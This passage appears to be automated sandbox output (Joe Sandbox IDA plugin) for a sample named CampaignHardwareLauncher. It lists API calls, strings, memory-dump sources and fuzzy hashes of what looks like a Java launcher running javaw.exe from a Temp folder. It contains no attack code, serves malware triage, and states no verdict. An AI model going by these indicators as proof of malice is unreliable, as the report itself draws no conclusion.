                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$FindLoadLockstrlen$strcat$ErrorLastfprintf
                                                                                                                                                                                                                                                                                                                • String ID: - $-bit$An error occurred while starting the application.$Resource %d:%s
                                                                                                                                                                                                                                                                                                                • API String ID: 484976878-3376466240
                                                                                                                                                                                                                                                                                                                • Opcode ID: b992894269d4df67585a336ef44875f4a4d0f1fa0297b5c6ea2c178211651a31
                                                                                                                                                                                                                                                                                                                • Instruction ID: 34e31f97e9555f3506bafa7709ed99a0cf1f3aa383949e3ef6a0ea41d6191ac0
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b992894269d4df67585a336ef44875f4a4d0f1fa0297b5c6ea2c178211651a31
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50B170B07183018BD704EF3AD64035ABAE1BB84344F05C93ED989E7391D77DC9658B9A
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strcpy$memsetstrcmpstrlen$fprintfstrcat$EnumOpenstrchrstrncpy
                                                                                                                                                                                                                                                                                                                • String ID: %s-bit search:%s...$Check:%s$Ignore:%s$Match:%s
                                                                                                                                                                                                                                                                                                                • API String ID: 972160396-103288940
                                                                                                                                                                                                                                                                                                                • Opcode ID: c86c034fc67a71293e03635b1d03b0b522562ab163ebdae5596db442e3a19ad0
                                                                                                                                                                                                                                                                                                                • Instruction ID: 9a2c2f7deab8620c59848cd1e9c546dad7476eac0264ac07e1180a0b30e31d97
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c86c034fc67a71293e03635b1d03b0b522562ab163ebdae5596db442e3a19ad0
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25A12AB49087149BC711EF25C98429EFBF5AF84704F0188BFE489A7391D7789A858F86
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strcat$strncat$memsetstrchr$CurrentDirectoryEnvironmentVariablestrlenstrstr
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher$C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657$EXEDIR$EXEFILE$HKEY$JREHOMEDIR$OLDPWD$PWD$Substitute:%s = %s
                                                                                                                                                                                                                                                                                                                • API String ID: 3324974479-3356529774
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • Heap %s:Requested %d MB / %d%%, Available: %d MB, Heap size: %d MB, xrefs: 00403688
                                                                                                                                                                                                                                                                                                                • Heap limit:Reduced %d MB heap size to 32-bit maximum %d MB, xrefs: 004036B0
                                                                                                                                                                                                                                                                                                                • Resource %d:%s, xrefs: 004034A3, 00403563
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$FindLoadLockatoifprintfstrlen$ErrorLast_itoastrcat
                                                                                                                                                                                                                                                                                                                • String ID: Heap %s:Requested %d MB / %d%%, Available: %d MB, Heap size: %d MB$Heap limit:Reduced %d MB heap size to 32-bit maximum %d MB$Resource %d:%s
                                                                                                                                                                                                                                                                                                                • API String ID: 1284713559-335395982
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strstr$fprintfmemset$EnvironmentVariablefopenstrlenstrncpy
                                                                                                                                                                                                                                                                                                                • String ID: Version:%s$--l4j-debug$--l4j-debug-all$3.9$CmdLine:%s %s$debug$debug-all$j.lo$nch4
                                                                                                                                                                                                                                                                                                                • API String ID: 1991431792-3923029096
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • --l4j-, xrefs: 00405C50, 00405C8E
                                                                                                                                                                                                                                                                                                                • -Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;dd, xrefs: 00405C13, 00405C2F, 00405CAE, 00405CCA
                                                                                                                                                                                                                                                                                                                • Resource %d:%s, xrefs: 00405D11
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$strcatstrlenstrstr$ErrorFindLastLoadLockmemsetstrchrstrcpy
                                                                                                                                                                                                                                                                                                                • String ID: --l4j-$-Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;dd$Resource %d:%s
                                                                                                                                                                                                                                                                                                                • API String ID: 782867121-4005303488
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strstr$Open$CloseQueryValuestrchrstrrchr
                                                                                                                                                                                                                                                                                                                • String ID: HKEY$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS
                                                                                                                                                                                                                                                                                                                • API String ID: 356245303-4236897492
                                                                                                                                                                                                                                                                                                                • Opcode ID: a1b4684ee25663612e490b4be978381a64ee457d4bbee82a063a929b877f78fc
                                                                                                                                                                                                                                                                                                                • Instruction ID: 2ae7df6790b6f1853f37995f78c893f74154cd1711da3b843cecc37fcb260c67
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1b4684ee25663612e490b4be978381a64ee457d4bbee82a063a929b877f78fc
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B414FB5D087069BDB00EF69C98425EFBE1BF84314F05883FE988A7381D77899448B96
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • Working dir:%s, xrefs: 00403CBF
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher, xrefs: 00403BCC
                                                                                                                                                                                                                                                                                                                • Resource %d:%s, xrefs: 00403CFD
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$fprintfmemset$CurrentDirectoryErrorFindLastLoadLock_chdirstrcatstrlenstrncpy
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher$Resource %d:%s$Working dir:%s
                                                                                                                                                                                                                                                                                                                • API String ID: 422477114-348739452
                                                                                                                                                                                                                                                                                                                • Opcode ID: 9c9ccb99f420a877555200c07f2862f7891259c708e168cf86730445fea71b0e
                                                                                                                                                                                                                                                                                                                • Instruction ID: 349f221890d6d40fe71c0e96cafd37487ebf52b12bf3dfd57c186abffd885e97
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c9ccb99f420a877555200c07f2862f7891259c708e168cf86730445fea71b0e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1416BB19087119BE700AF29D58135EBFE4EF84344F01883EE989A7381D7389994CB8A
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00405211
                                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00405228
                                                                                                                                                                                                                                                                                                                • FindResourceExA.KERNEL32(?,00000000,?), ref: 00405250
                                                                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,?,?,00406514), ref: 0040526D
                                                                                                                                                                                                                                                                                                                • LockResource.KERNEL32(?,?,?,?,?,00406514), ref: 0040527C
                                                                                                                                                                                                                                                                                                                • fprintf.MSVCRT ref: 004052C8
                                                                                                                                                                                                                                                                                                                • SetEnvironmentVariableA.KERNEL32 ref: 004052EC
                                                                                                                                                                                                                                                                                                                • strtok.MSVCRT(?,?,?,?,00406514), ref: 004052FF
                                                                                                                                                                                                                                                                                                                • strchr.MSVCRT ref: 00405316
                                                                                                                                                                                                                                                                                                                • fprintf.MSVCRT ref: 0040535A
                                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00406514), ref: 00405373
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$fprintfmemset$EnvironmentErrorFindLastLoadLockVariablestrchrstrtok
                                                                                                                                                                                                                                                                                                                • String ID: Resource %d:%s$Set var:%s = %s
                                                                                                                                                                                                                                                                                                                • API String ID: 301265589-2172967655
                                                                                                                                                                                                                                                                                                                • Opcode ID: 269e6b674d12423d849caec9e5e778c3ff3d2c18b953fcfb33869b71bd7f8dc3
                                                                                                                                                                                                                                                                                                                • Instruction ID: afa5dd9bf5237a591f145b88366e3ef618c797e9271656589243b0a106b18b75
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 269e6b674d12423d849caec9e5e778c3ff3d2c18b953fcfb33869b71bd7f8dc3
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA4138B0A087019BD710AF2AD58035FBBE4EF88340F41C87EE489A7391D738D9559F9A
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • Error:%s, xrefs: 0040518B
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe, xrefs: 004050F1
                                                                                                                                                                                                                                                                                                                • appendToPathVar failed., xrefs: 00405186
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strlen$EnvironmentVariablememset$fprintfstrcatstrcpy
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe$Error:%s$appendToPathVar failed.
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe, xrefs: 004041A5
                                                                                                                                                                                                                                                                                                                • Runtime used:%s (%s-bit), xrefs: 004041DF
                                                                                                                                                                                                                                                                                                                • Resource %d:%s, xrefs: 0040428D
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657, xrefs: 004041AC
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$FindLoadLockatoifprintfstrcpy
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657$C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe$Resource %d:%s$Runtime used:%s (%s-bit)
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$ErrorLastfprintf$CreateFindLoadLockMutexmemset
                                                                                                                                                                                                                                                                                                                • String ID: Error:%s$Instance already exists.$Resource %d:%s
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • jre, xrefs: 004028D5
                                                                                                                                                                                                                                                                                                                • JavaHome, xrefs: 00402872
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657, xrefs: 0040290A
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: memset$CloseOpenQueryValuestrcatstrcpystrlen
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657$JavaHome$jre
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe, xrefs: 004041A5
                                                                                                                                                                                                                                                                                                                • Runtime used:%s (%s-bit), xrefs: 004041DF
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657, xrefs: 004041AC
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$fprintf$ErrorFindLastLoadLockatoistrcpy
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657$C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe$Runtime used:%s (%s-bit)
                                                                                                                                                                                                                                                                                                                • API String ID: 440416407-3008814978
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • jre, xrefs: 004028D5
                                                                                                                                                                                                                                                                                                                • JavaHome, xrefs: 00402872
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657, xrefs: 0040290A
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CloseQueryValuememsetstrcatstrcpystrlen
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657$JavaHome$jre
                                                                                                                                                                                                                                                                                                                • API String ID: 2049115317-3807237096
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$FindLoadLockatoifprintf
                                                                                                                                                                                                                                                                                                                • String ID: Resource %d:%s$`O@
                                                                                                                                                                                                                                                                                                                • API String ID: 2193512306-2494596910
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$atoi$ErrorFindLastLoadLockfprintf
                                                                                                                                                                                                                                                                                                                • String ID: Resource %d:%s
                                                                                                                                                                                                                                                                                                                • API String ID: 1405122715-3770364717
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$ErrorFindLastLoadLockfprintf
                                                                                                                                                                                                                                                                                                                • String ID: Resource %d:%s$true
                                                                                                                                                                                                                                                                                                                • API String ID: 2300709556-1650570159
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AddressCurrentHandleModuleProcProcessfprintf
                                                                                                                                                                                                                                                                                                                • String ID: IsWow64Process$WOW64:%s$yes
                                                                                                                                                                                                                                                                                                                • API String ID: 24026888-2072328098
                                                                                                                                                                                                                                                                                                                • Opcode ID: 79cba90a5c32919940d47014e4f11db2286ddd08fea7034ebff4aa08fe6649a9
                                                                                                                                                                                                                                                                                                                • Instruction ID: aea4bb79273e8d534990c21f24d6dc2711a2c6fda4608cbe9aad56ecb48cfa11
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79cba90a5c32919940d47014e4f11db2286ddd08fea7034ebff4aa08fe6649a9
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9001677060430597CB00BF75D58521B76E0AB84348F01C83ED5857B381D778DC25CB9A
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AddressCurrentHandleModuleProcProcessfprintf
                                                                                                                                                                                                                                                                                                                • String ID: IsWow64Process$WOW64:%s$yes
                                                                                                                                                                                                                                                                                                                • API String ID: 24026888-2072328098
                                                                                                                                                                                                                                                                                                                • Opcode ID: 0f449fa4e61134affe168ec5c855c7a0e9b7151d64be7ae9747b5a4d41c4c0fd
                                                                                                                                                                                                                                                                                                                • Instruction ID: a217be7bda152947c960663f56388daf3a3792abde6a83131336f65876ccd3cc
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f449fa4e61134affe168ec5c855c7a0e9b7151d64be7ae9747b5a4d41c4c0fd
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52F03170A0830597DB00BF75D58511F7AE4AB84348F01C83ED985AB3D6EB78DC249B9A
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • --l4j-, xrefs: 00405C50, 00405C8E
                                                                                                                                                                                                                                                                                                                • -Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;dd, xrefs: 00405CAE, 00405CCA
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strstr$ErrorLaststrcatstrchrstrcpystrlen
                                                                                                                                                                                                                                                                                                                • String ID: --l4j-$-Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;dd
                                                                                                                                                                                                                                                                                                                • API String ID: 1304447673-1328920229
                                                                                                                                                                                                                                                                                                                • Opcode ID: d165a1be7fc4b68c02de8a7e451452b4915db2d7301cae9c236fcca6c72a7ef8
                                                                                                                                                                                                                                                                                                                • Instruction ID: 56afbf9f269423abcfbc407513a566e97e7e4f5f61a7ec7fa9ea9c2cf9926f11
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d165a1be7fc4b68c02de8a7e451452b4915db2d7301cae9c236fcca6c72a7ef8
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 950109745087109AE710AF65C44436BBAE1EF44304F45887FD589B73C2D77D88518B8A
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
